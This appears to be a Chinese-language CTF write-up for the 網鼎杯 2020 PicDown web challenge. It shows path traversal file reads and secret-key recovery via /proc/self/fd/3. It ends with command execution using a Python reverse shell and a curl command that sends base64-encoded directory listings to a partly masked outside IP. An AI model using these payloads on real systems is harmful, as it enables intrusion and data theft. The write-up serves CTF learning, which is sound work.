技術標籤：檔案包含模板注入SSTI 命令執行 python bash 資訊保安 shell

知識點

檔案讀取
檔案描述符
python程式碼審計
反彈shell

WP

總的來說還是一道比較簡單的題目，有毒的地方就是那個url，我卡在那個url上面了，我真的以為這是一個SSRF，沒想過去試試直接檔案讀取，沒想到真的這樣：

?url=../../../../../etc/passwd

可以讀到東西。雖然我也嘗試過用file，但是沒讀到東西，看來是被過濾了，還是自己的基礎知識掌握的太差了。

可以讀檔案後就進行讀，然後就發現直接讀到了flag。。。。：

?url=../../../../../flag

是環境的問題，網鼎杯比賽的時候flag檔案在其他的地方。

正常的思路肯定是讀這些：

/proc/self/environ
/proc/self/cmdline

可以讀到python2 app.py，然後我們讀一下/proc/self/cwd/app.py

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = 
 f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = 
 res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

稍微審計一下程式碼，還是對檔案描述符的考察了，金鑰可以在/proc/self/fd/3裡面讀到，然後傳入密碼和shell，就可以執行了。但是問題是沒有回顯，這題有兩種方式。一種是直接python反彈shell：

?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.***.***.***",39555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然後直接讀flag就可以了：
在這裡插入圖片描述
還有一種是curl反彈shell：

?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=curl 118.***.***.***/`ls /|base64`

因為結果裡有換行，日誌裡只能顯示第一行的內容，所以還要base64加密一次：
在這裡插入圖片描述
再加密就可以得到完成的命令執行內容了，都可以得到flag。

[網鼎杯 2020 白虎組]PicDown

知識點

WP

[網鼎杯 2020 白虎組]PicDown

[網鼎杯 2020 青龍組]AreUSerialz

刷題[網鼎杯 2020 朱雀組]phpweb

刷題記錄：[網鼎杯 2020 玄武組]SSRFMe

[網鼎杯 2020 青龍組]jocker

CTF程式碼審計之[網鼎杯 2020 青龍組]AreUSerialz

[網鼎杯 2020 朱雀組]phpweb

BUUCTF | [網鼎杯 2020 朱雀組]phpweb

[網鼎杯 2020 玄武組]SSRFMe

[網鼎杯 2020 朱雀組]Nmap(namp寫webshell)

[網鼎杯 2020 朱雀組]phpweb1

[網鼎杯 2020 青龍組]AreUSerialz-PHP反序列化

[BUUOJ記錄] [網鼎杯 2020 朱雀組] phpweb

[網鼎杯 2020 青龍組]AreUSerialz 1

[網鼎杯 2020 朱雀組]Nmap 1

2020-網鼎杯-青龍組-Web-AreUSerialz

[極棒雲鼎杯2020] Web題

網鼎杯-re-signal

網鼎杯

[網鼎杯 2018]Fakebook

[網鼎杯 2020 白虎組]PicDown

知識點

WP

相關推薦